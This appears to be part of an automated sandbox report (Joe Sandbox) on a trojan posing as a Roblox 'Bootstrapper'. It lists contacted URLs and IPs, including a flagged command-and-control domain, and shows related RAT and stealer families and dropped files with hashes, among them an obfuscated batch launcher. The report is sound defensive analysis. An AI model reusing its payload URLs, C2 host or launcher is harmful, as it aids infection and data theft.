http://nutipa.ru/	Mscrt.exe, 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json	wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	false		high
http://127.0.0.1:64632	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAAF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.newtonsoft.com/jsonschema	Bootstrapper.exe.0.dr	false		high
http://nutipa.ru	Mscrt.exe, 00000014.00000002.2933764806.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002F49000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson	wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	false		high
http://nodejs.org	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AC98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:6463/rpc?v=1	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAAF000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901A9B1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA4D000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 0000000A.00000002.1800397779.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp	false		high
http://clientsettings.roblox.com	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB25000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAC7000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/pjseRvyK	wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	false		high
https://clientsettings.roblox.com	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://edge-term4-fra2.roblox.com	Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.64.130	unknown	United States	13335	CLOUDFLARENETUS	false
128.116.123.3	edge-term4-fra2.roblox.com	United States	22697	ROBLOX-PRODUCTIONUS	false
172.67.185.214	nutipa.ru	United States	13335	CLOUDFLARENETUS	true
104.21.93.27	getsolara.dev	United States	13335	CLOUDFLARENETUS	false
104.20.22.46	www.nodejs.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575287
Start date and time:	2024-12-15 04:16:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wmdqEYgW2i.exe renamed because original name is a hash value
Original Sample Name:	8576F95A0E018025E8B46367AE311E83.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@29/71@5/6
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.109.210.53, 20.190.147.12, 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Bootstrapper.exe, PID 7532 because it is empty
Execution Graph export aborted for target Mscrt.exe, PID 3084 because it is empty
Execution Graph export aborted for target Mscrt.exe, PID 7884 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:17:05	API Interceptor	73x Sleep call for process: Bootstrapper.exe modified
22:17:25	API Interceptor	1465375x Sleep call for process: Mscrt.exe modified
22:17:39	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.64.130	https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2	Get hash	malicious	PayPal Phisher	Browse
	https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2	Get hash	malicious	PayPal Phisher	Browse
	https://casa.tiscali.it/promo/?u=https://rajputnepal.org.np/images/wp/auth/sf_rand_string_lowercase/brogers@homeownersfg.com	Get hash	malicious	Unknown	Browse
	http://vk.com/away.php?to=http://5pp.n0u.mindfly.sa.com./?YYY%3A%2F%2F%23.cGF0cmljaWEuZW5nZWxicmVjaHRAZXVyLm5s	Get hash	malicious	HTMLPhisher	Browse
	https://staelensbe-my.sharepoint.com/:o:/g/personal/y_perat_staelens_be/Eh14BaQBnshOnnl-1qkV04QBK4iCBXufLQTxHyB9kk2q_A?e=5%3a4EIhFl&at=9	Get hash	malicious	HTMLPhisher, SharepointPhisher	Browse
	Agreements Signature UYBWE6432324.html	Get hash	malicious	Unknown	Browse
	https://imsciencesedupk-my.sharepoint.com/:o:/g/personal/asim_iqbal_imsciences_edu_pk/ElMAC5PDodtLven3cSAK7AsBoGl8vhEeoWFGC5-26FuhVA?e=5%3ap8MOBi&at=9	Get hash	malicious	SharepointPhisher	Browse
	https://skinlaundry-my.sharepoint.com/:o:/p/hayley/ErwFOgIpkFpEkqlJMxBaZKABrOVvhmW-2C7PFfCQdhhmhA?e=5%3atlRlQl&at=9	Get hash	malicious	HTMLPhisher, SharepointPhisher	Browse
	File Documents UYBER87H412_23_24.html	Get hash	malicious	Unknown	Browse
128.116.123.3	8Hd0ZExgJz.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse
	KKjubdmzCR.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse
	SolaraBootstrapper.exe	Get hash	malicious	DCRat, XWorm	Browse
	https://www.roblox.com.zm/login	Get hash	malicious	Unknown	Browse
	RobloxPlayerLauncher.exe	Get hash	malicious	Unknown	Browse
172.67.185.214	https://my.invoice-maker.app/share/invoice/90AB85B8-591C-4510-9A95-0A435E8FF643	Get hash	malicious	PayPal Phisher	Browse
	https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2	Get hash	malicious	PayPal Phisher	Browse
	https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2	Get hash	malicious	PayPal Phisher	Browse
	https://my.invoice-maker.app/share/show/67663E57-C8C7-4CC4-BAAE-1557D89C5215	Get hash	malicious	PayPal Phisher	Browse
	http://api.sparknotifications.walmart.com/api/track?action=click&campaign=bsjy1uwl6v9y9x1&message_id=BQ6NGO3PoZ-1660831276514&trackingid=BvI-3ijv7u&redirect=http://7uk.cnz.hydropodes.sa.com.///?YYY#.TWFyaW8uTGFmcmFtYm9pc2VAYXNzbmF0LnFjLmNh	Get hash	malicious	HTMLPhisher	Browse
	https://www.newsbreakmail.com/redirect/aHR0cHM6Ly9waXczbW92c3ZtNjNkYzY1MDUxYmE2Ni54aW5odWF3ZWkucnUvTWNtUmhiV0YwYjBCaWNuZHVZMkZzWkM1amIyMD0=	Get hash	malicious	HTMLPhisher	Browse
104.21.93.27	Bootstrapper.exe	Get hash	malicious	Unknown	Browse
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse
	sDKRz09zM7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	bootstraper.exe	Get hash	malicious	Unknown	Browse
	bootstraper.exe	Get hash	malicious	Unknown	Browse
	8Hd0ZExgJz.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse
	KKjubdmzCR.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse
	SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
getsolara.dev	Bootstrapper.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.93.27
	sDKRz09zM7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.21.93.27
	kwlYObMOSn.exe	Get hash	malicious	XWorm	Browse	172.67.203.125
	bootstraper.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
	bootstraper.exe	Get hash	malicious	Unknown	Browse	104.21.93.27
	8Hd0ZExgJz.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	104.21.93.27
	KKjubdmzCR.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.93.27
	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	104.21.93.27
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	172.67.203.125
edge-term4-fra2.roblox.com	8Hd0ZExgJz.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	128.116.123.3
	KKjubdmzCR.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	128.116.123.3
	SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe	Get hash	malicious	Blank Grabber	Browse	128.116.123.4
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse	128.116.123.4
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse	128.116.123.3
	BootstrapperV1.19.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	128.116.123.4
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
	SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe	Get hash	malicious	Unknown	Browse	128.116.123.4
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	128.116.123.3
nodejs.org	Bootstrapper.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	104.20.23.46
	download.ps1	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	y3x8pjQ1Ci.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	y3x8pjQ1Ci.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	download.ps1	Get hash	malicious	Unknown	Browse	104.20.22.46
	download.ps1	Get hash	malicious	Unknown	Browse	104.20.22.46
	download.ps1	Get hash	malicious	Unknown	Browse	104.20.22.46
	download.ps1	Get hash	malicious	Unknown	Browse	104.20.23.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROBLOX-PRODUCTIONUS	Bootstrapper.exe	Get hash	malicious	Unknown	Browse	128.116.119.3
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	128.116.119.3
	sDKRz09zM7.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	128.116.119.3
	kwlYObMOSn.exe	Get hash	malicious	XWorm	Browse	128.116.119.3
	bootstraper.exe	Get hash	malicious	Unknown	Browse	128.116.119.3
	bootstraper.exe	Get hash	malicious	Unknown	Browse	128.116.119.3
	8Hd0ZExgJz.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	128.116.123.3
	KKjubdmzCR.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	128.116.123.3
	AYUGPPBj0x.exe	Get hash	malicious	DCRat	Browse	128.116.44.3
	IM3OLcx7li.exe	Get hash	malicious	XWorm	Browse	128.116.44.4
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.51.88
	Bootstrapper.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse	172.67.192.146
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.21.50.161
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.93.27
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	172.66.44.59
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.79.7
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	104.20.4.235
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.51.88
	Bootstrapper.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse	172.67.192.146
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.21.50.161
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.93.27
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	172.66.44.59
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.79.7
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	104.20.4.235
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.51.88
	Bootstrapper.exe	Get hash	malicious	Unknown	Browse	104.20.22.46
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse	172.67.192.146
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.21.50.161
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.93.27
	https://f29cc861.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Get hash	malicious	HTMLPhisher	Browse	172.66.44.59
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.79.7
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	104.20.4.235

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	LaRHzSijsq.exe	Get hash	malicious	DCRat	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	FEDEX234598765.html	Get hash	malicious	WinSearchAbuse	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Unknown	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	128.116.123.3 104.21.93.27 104.20.22.46
	file.exe	Get hash	malicious	XWorm	Browse	128.116.123.3 104.21.93.27 104.20.22.46

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with very long lines (975), with no line terminators
Category:	dropped
Size (bytes):	975
Entropy (8bit):	5.8997135605875695
Encrypted:	false
SSDEEP:	24:6aqjybnJX5gSCwsjGyqGJSR4LtFKVtG2nT/tSluJvZ:6v2JfCLjGlILt24w5NNZ
MD5:	5CA0F3D2C91114EB74412FD5CADC13A2
SHA1:	3AC25DDD1B7C23AA50E5AD01981F1833650C7296
SHA-256:	7DF98F7AC68C3DE35FE77AB20F6572FBADEEB43AC6B6A034000862A507CF99E6
SHA-512:	4A7941FFCEC49E0D46EB54224A36B04EF7EE18C8189186BBD5C59658365CE4463361154CCB13F22A3A1A787E6A0C7F2D425F8F82D3840B80769089DB18338839
Malicious:	false
Preview:	fNRtIYEs3OiaNFVxysuTK2StnGBdoQQGkbC1n8bkch0VgCq3QmJZL7ym4iFBWlDn7bzwDeKzQJ0mC7MlaIMBG05nmZ6F2aN1dMXFM4zwcTIBHMj6VelOYCgGgMJnhE7068IzkGYfSajws3ga0AtYy9dbpQjAuMPXWRFIDuWPFF57cuYmptxgViB6fqJThXvGLLZayXWGoeTsDf8527UBYsCxQInWkCsrUzwRU7xSWr21PT39sOajDtsdJmKqtAflwlXOsrl4KCprzKi6OooVlIolHTHsxGjVLRFo5pRBnfZAEAn8DNbFWK9n7wHYj2HDcTfiF4BjWnsGsnhGqJojpd9BRbqIh2buYWhufF2JM2ssb35TPBsaOhX8TeQoN2BeL7rWFwkkQfXxvQjYgW3gJBg08jaBzO5T0OheLiOcaHJtJkND41I09fUKb1XgWjvCjE6gtFN7IaGC1wqXVXG7FFTU4WCUKrG0WHKFnqTzoLsiZSToKAL8dy6dummWC2waUPptmltoDQS4Xv5mDXJKgHXhLqUBE7wwYRNJmjBjQg5MgCG8qASotl3M2Ii6QrkGeffFhw9eWj3AMKAIjVVDoHCwYBReAFTi6ysAgBb4AySJs39rHZX4WgcWdsrgffdRQVDYbAmh4aC0z2EeBjWkrYLZWWhxU5ZfUB3WzlQHxz96dmglnMe5I3j1JnBFdyN9Bhfx9roaTPx2ZP6uz5JHadWbcBNLjKo8lA56Gsl5hEm2Fqc3rRPhoGihKEV7ed0IlyRZUAnGUNjW0dVvjUeR4GUfbXvBXobENeRQZDirnJNagMqqsjYJ8iNeew77OmtpweIWMFWfvxnv338OqFTxQRFoQwvmFldBZhoBEUdnM2YL5bklytQIT5ZeYdFZTuaJTmWWO6KVlplY34tzLKyVUUseIKnkPEUcbO1SFOW1j5hnTBkeuPOI5Ez931NETjGhVI6oCat6y7wZxFK

C:\ComponentReviewperfmonitor\4e2afe13b84ff4

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	5.5798461221198545
Encrypted:	false
SSDEEP:	3:Gl7o/p/RVMFnkloJkZxLgYGtgTadDpyx8sfopLfQMikcH8Uzn:G5eRRnlosutg2djL4MLUz
MD5:	26CFBEE9587AC2FC7D309C7B554AC6F4
SHA1:	5481D03B6FBD354F412AE6958918BB174FDFB33E
SHA-256:	D82B3D81F0ED324EFF20CF865B440EF67002ABDD961B6E96C9B74483FDA7A82A
SHA-512:	8179EFB3FBEC5CBE51BFD244B5BCF061EBFD46CAC9284B09020268FFF0B36DBEACF215A0E32A5360E9014AFBB6E676201CFFD5233B455FD47CBA9D3B12A1A4BF
Malicious:	false
Preview:	4FYLV53HlSj7AJ134Hn2TVjjgeQug3ihrBSXiopUTlQea8BuqBB94kzjgzp1oJkstBQ81eUQbSjsEEIicgEf1jmGMt1t8ypJAiuYrC2MquhlBHecqHYIFF0KZJwInlRnnZrgTu0an2yGBAFEOYD1ZhE4rk9

C:\ComponentReviewperfmonitor\659c2d566c795c

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with very long lines (841), with no line terminators
Category:	dropped
Size (bytes):	841
Entropy (8bit):	5.8920605928794325
Encrypted:	false
SSDEEP:	24:0UcWGXlLoqI1dzV1vj6F8o3TGIGx/tgRcAbl:0X/hodzV1L8yjacAbl
MD5:	76D30635888BAE9F87EEF76B939EB756
SHA1:	564C2DAB17BC9496825D2B5AD512B462B021AF2E
SHA-256:	49DB32163DBDCD546C8CEC4C33CF3BEC2E1A775AAD1F6ABD89AA06499EA382E1
SHA-512:	4C3637311B251A7A24A4063935A37E07461BFFC62C214D840301BA89F91153A0A507573CF6E6BFF5E7CC450693C5C7FDBBE6322B870F182504D64D0CEB1538A7
Malicious:	false
Preview:	LhXZ2ZOBRi9y9SLE5cTgRU8SZLyqGeKtGrJljPJBf5gYxkxw9Cnqhdi1jF9rlh4wXPsSJjfqSRAVxjezXBqD1eMnIRCdPca8BtAh2fnZg7XPdND9kKTj0052DEK1hBa01CUDi762YQg3H7K5NC3FI0HKyIdxVv2fggXa29amNaKkTCuG4OnfIVrB5KPadJhmYBWljtCOlQ1sph0vXX3GIWXLyWfstAJE3iLSpJgLMZ31d9VXUeDGQbeBoLwNNTelHxzHVhFN0r3scfrzAIYP6CybDJneWS835StqKOCwYzPiiviId7NF4OoE9XDL3l0htAxKwBowFm1HxQ3RkfBZF38qoprwK02w9ryh8YWcTb9SXhRtdvlYkbc0BGfHU1lPtEIFbVTMJiGo3pTHY8SYPdMhP8g12PIbztiSYLRIcYPBVy6VxYtViMAP1k0dzcT4aoyJHAsMqK60OLMaBKEdfw2mtSayUyT9FVkq9xOwqgpYQKBqYZcoYzYowLZyj42216v3kfbN6Rx9HdWjRua4WolP764yXaMwnwgUYHF28OsGCYhSz0gze8gMVf6olm0fFBWU6CKJoh5H6eMiZl9h3XSpQT83LbQWYMBACMVwpXK6CYQ0SXPAnTmstqEnDR7NQjttdMgMPM1gMVn1DIkyLQtFkTRVIstXZ7pcphXG1CuabGfXDMk4rJBA0oJJ4KEhcdGPqKMfvd6IgSnex4S6IyqP5pmAYNMr8M779Qr29EJNN2ehApVA1HZnx1TBiMHhRPJTVqehMZ6DpcCCKE9s2Lz1xTJH6qUx7m67tKMUKyxbKV8UyR0dMYpFaSfBgWkgEJGDgET91

C:\ComponentReviewperfmonitor\Mscrt.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3700736
Entropy (8bit):	7.825669080809428
Encrypted:	false
SSDEEP:	98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
MD5:	E7870CD0C30A52066C454C15A5A5A2F5
SHA1:	FC64203E05C104A116E7E4C354C9EE77C99737D6
SHA-256:	E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
SHA-512:	3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentReviewperfmonitor\Mscrt.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentReviewperfmonitor\Mscrt.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	83
Entropy (8bit):	4.995479269129842
Encrypted:	false
SSDEEP:	3:zmm5oiXROeEKxZmAKIg6isMKERkRc:zmcZXROu3mAToDKzc
MD5:	514F93D92AE221458937C720626B46B3
SHA1:	608EABEAB6FD1B15449452C146DCA0E08421B3E5
SHA-256:	630C846609CC08488485CD976CA51355F8C43666D59186DF6936747CE06D383F
SHA-512:	83EC92C38BE82FFB0E817AC97E545EF8C83C19E891474CA78FE469FE99DA63A5E00C38449D04A7DE31BE543C64A99ADB5732D2E7D966EACCC23998666E7AAE28
Malicious:	false
Preview:	%JMbBcTEl%%DvixtpzMU%..%SUtxiWhaoTsV%"C:\ComponentReviewperfmonitor/Mscrt.exe"%Hfz%

C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	216
Entropy (8bit):	5.799956007649376
Encrypted:	false
SSDEEP:	6:GVwqK+NkLzWbHZEG8nZNDd3RL1wQJRiiEO/5OdzhDpoRWs:G4MCzWL6G4d3XBJ/EK5ylkWs
MD5:	27F28B26B1A641E515A8C84280FC4638
SHA1:	103D1E3B99C8900E4FDE8CF88E91E9A30132E614
SHA-256:	7610DEC18100D028FEB67FD231CED9F363FFCF79A8788D8B37C909C5393BBD58
SHA-512:	AA2025DD4FFA8DD73838D10B6B2BD9B1A197DED1D4AA04645A2E51D33B5EE3D970C8B8DBEEBFE2F23D728CCEA83D63CA40501822BA57DDE477EDE93340C398C2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
